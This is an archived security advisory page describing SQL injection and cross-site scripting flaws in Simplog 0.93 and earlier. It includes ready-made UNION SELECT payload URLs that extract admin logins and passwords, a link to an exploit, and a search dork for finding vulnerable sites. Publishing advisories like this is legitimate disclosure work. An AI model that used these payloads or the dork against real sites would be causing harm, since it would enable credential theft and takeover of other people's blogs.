|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 799 CVE : CVE-2006-2029 CVE : CVE-2006-2028 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Mustafa Can Bjorn IPEKCI (nukedx nukedx com) Published : 28.04.2006
Advisory Text : --Security Report-- Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 21/04/06 22:13 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: Simplog (http://www.simplog.org/) Version: 0.93 and prior versions must be affected. About: Via this methods remote attacker can inject arbitrary SQL queries to tid parameter in preview.php, cid,pid and eid in archive.php and pid in comments.php.As u know rgod was published advisory about version 0.92 but he did not notice this SQL injections. He found other SQL injections on archive.php but did not found these vulnerabilities. Also there is cross site scripting vulnerability in imagelist.php's imagedir parameter. Level: Critical --- How&Example: SQL Injection : Needs MySQL > 4.0 GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL] EXAMPLE -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1/**/UNIO N/**/SELECT/**/ concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/ **/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1/**/UNION/**/SE LECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* with this examples remote attacker can leak speficied admins login information from database. XSS: GET -> http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login= 1&imagedir=[XSS] --- Timeline: * 21/04/2006: Vulnerability found. * 21/04/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=25 --- Dorks: "powered by simplog" --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=25 Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |